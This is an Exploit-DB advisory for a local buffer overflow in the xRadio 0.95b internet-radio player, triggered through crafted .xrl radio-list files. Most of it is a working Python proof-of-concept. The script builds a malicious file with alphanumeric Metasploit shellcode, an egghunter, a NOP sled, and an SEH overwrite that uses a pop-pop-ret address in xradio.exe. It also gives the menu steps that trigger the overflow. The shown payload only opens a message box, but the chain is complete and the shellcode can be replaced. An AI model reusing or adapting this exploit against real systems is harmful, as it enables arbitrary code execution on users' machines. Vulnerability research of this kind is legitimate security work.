xRadio 0.95b - '.xrl' Local Buffer Overflow (SEH)

EDB-ID:

16141

CVE:



Author:

b0telh0

Type:

local


Platform:

Windows

Date:

2011-02-09


GotGeek Labs
http://www.gotgeek.com.br/

xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)



[+] Description

With xRadio you can listen internet radio with Windows Media Player Technology (tm).
You can setup a radio list and import asx's files. The program stay on the tray bar.



[+] Information

Title: xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)
Advisory: gg-001-2011
Date: 02-08-2011
Last update: 02-08-2011
Link: http://www.gotgeek.com.br/pocs/gg-001-2011.txt
Tested on: Windows XP SP3 (VirtualBox)



[+] Vulnerability

xRadio is affected by stack-based buffer overflow vulnerability because it fails
to perform adequate boundary checks on user-supplied input.
Successful exploitation of the vulnerability allows an attacker to execute
arbitrary code. Other versions are also affected but have a different trigger.

Affected Versions:
xRadio 0.95b
xRadio 0.9
xRadio 0.5



[+] Proof of Concept/Codes

#!/usr/bin/python
#


#
# windows/messagebox - 590 bytes
# x86/alpha_upper
# http://www.metasploit.com
#
shellcode = ("\x89\xe1\xd9\xd0\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
	"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
	"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
	"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
	"\x38\x41\x43\x4a\x4a\x49\x58\x59\x5a\x4b\x4d\x4b\x58\x59\x54"
	"\x34\x47\x54\x4c\x34\x50\x31\x58\x52\x4e\x52\x43\x47\x50\x31"
	"\x58\x49\x52\x44\x4c\x4b\x52\x51\x56\x50\x4c\x4b\x54\x36\x54"
	"\x4c\x4c\x4b\x54\x36\x45\x4c\x4c\x4b\x51\x56\x43\x38\x4c\x4b"
	"\x43\x4e\x47\x50\x4c\x4b\x56\x56\x50\x38\x50\x4f\x45\x48\x52"
	"\x55\x5a\x53\x51\x49\x45\x51\x58\x51\x4b\x4f\x4b\x51\x43\x50"
	"\x4c\x4b\x52\x4c\x51\x34\x47\x54\x4c\x4b\x50\x45\x47\x4c\x4c"
	"\x4b\x50\x54\x56\x48\x43\x48\x45\x51\x4b\x5a\x4c\x4b\x51\x5a"
	"\x45\x48\x4c\x4b\x50\x5a\x51\x30\x45\x51\x5a\x4b\x4d\x33\x50"
	"\x34\x51\x59\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x5a\x4e\x56\x51"
	"\x4b\x4f\x50\x31\x49\x50\x4b\x4c\x4e\x4c\x4d\x54\x4f\x30\x43"
	"\x44\x45\x57\x4f\x31\x58\x4f\x54\x4d\x43\x31\x49\x57\x5a\x4b"
	"\x4c\x34\x47\x4b\x43\x4c\x56\x44\x51\x38\x54\x35\x4b\x51\x4c"
	"\x4b\x50\x5a\x56\x44\x45\x51\x5a\x4b\x52\x46\x4c\x4b\x54\x4c"
	"\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x5a\x4b\x4c\x4b\x43"
	"\x34\x4c\x4b\x45\x51\x4b\x58\x4d\x59\x51\x54\x56\x44\x45\x4c"
	"\x45\x31\x58\x43\x4f\x42\x45\x58\x51\x39\x49\x44\x4b\x39\x4d"
	"\x35\x4b\x39\x49\x52\x43\x58\x4c\x4e\x50\x4e\x54\x4e\x5a\x4c"
	"\x51\x42\x4d\x38\x4d\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4c\x49\x51"
	"\x55\x54\x44\x4f\x4b\x43\x4e\x4e\x38\x4d\x32\x43\x43\x4b\x37"
	"\x45\x4c\x56\x44\x56\x32\x5a\x48\x4c\x4e\x4b\x4f\x4b\x4f\x4b"
	"\x4f\x4b\x39\x51\x55\x45\x58\x43\x58\x52\x4c\x52\x4c\x51\x30"
	"\x47\x31\x43\x58\x56\x53\x47\x42\x56\x4e\x45\x34\x43\x58\x52"
	"\x55\x54\x33\x45\x35\x52\x52\x4b\x38\x51\x4c\x56\x44\x54\x4a"
	"\x4d\x59\x4d\x36\x50\x56\x4b\x4f\x51\x45\x54\x44\x4c\x49\x58"
	"\x42\x56\x30\x4f\x4b\x4e\x48\x4e\x42\x50\x4d\x4f\x4c\x4c\x47"
	"\x45\x4c\x51\x34\x50\x52\x5a\x48\x43\x51\x4b\x4f\x4b\x4f\x4b"
	"\x4f\x45\x38\x43\x52\x52\x52\x51\x48\x47\x50\x45\x38\x52\x43"
	"\x52\x4f\x52\x4d\x56\x4e\x52\x48\x43\x55\x43\x55\x52\x4b\x56"
	"\x4e\x52\x48\x45\x37\x52\x4f\x43\x44\x52\x47\x50\x31\x49\x4b"
	"\x4c\x48\x51\x4c\x56\x44\x54\x4e\x4c\x49\x5a\x43\x52\x48\x52"
	"\x4c\x43\x58\x50\x30\x56\x38\x43\x58\x45\x32\x56\x50\x52\x54"
	"\x43\x55\x50\x31\x49\x59\x4b\x38\x50\x4c\x47\x54\x45\x57\x4c"
	"\x49\x4b\x51\x56\x51\x58\x52\x43\x5a\x47\x30\x50\x53\x50\x51"
	"\x51\x42\x4b\x4f\x58\x50\x56\x51\x49\x50\x56\x30\x4b\x4f\x50"
	"\x55\x43\x38\x41\x41")

junk = "\x41" * 3248
tag = "\x77\x30\x30\x74\x77\x30\x30\x74"	# w00tw00t
nops = "\x90" * 230

# Of course we don't need this.. It was just for fun...
#
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
             "\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")	# 32 bytes

nseh = "\xeb\x88\x90\x90"	   # jump back 118 bytes
seh  = "\x82\xe2\x47\x00"	   # pop eax - pop ebx - ret at 0x0047E282 [xradio.exe]
junk2 = "\x42" * 884

try:
    file = open('b0t.xrl','w');
    file.write(junk+tag+shellcode+nops+egghunter+nseh+seh+junk2);
    file.close();
    print "\n[*] gotgeek labs"
    print "[*] http://gotgeek.com.br\n"
    print "[+] b0t.xrl created."
    print "[+] Open xRadio.exe..."
    print "[+] and Radios >> Edit List >> Save radio list"
    print "[+] Select the *.xrl file, press Yes and boom!!\n"
except:
    print "\n[-] Error.. Can't write file to system.\n"



[+] References

http://www.puntoequis.com.ar/aktive/default.aspx?SC=SOFT&ID=xRadio



[+] Credits

b0telh0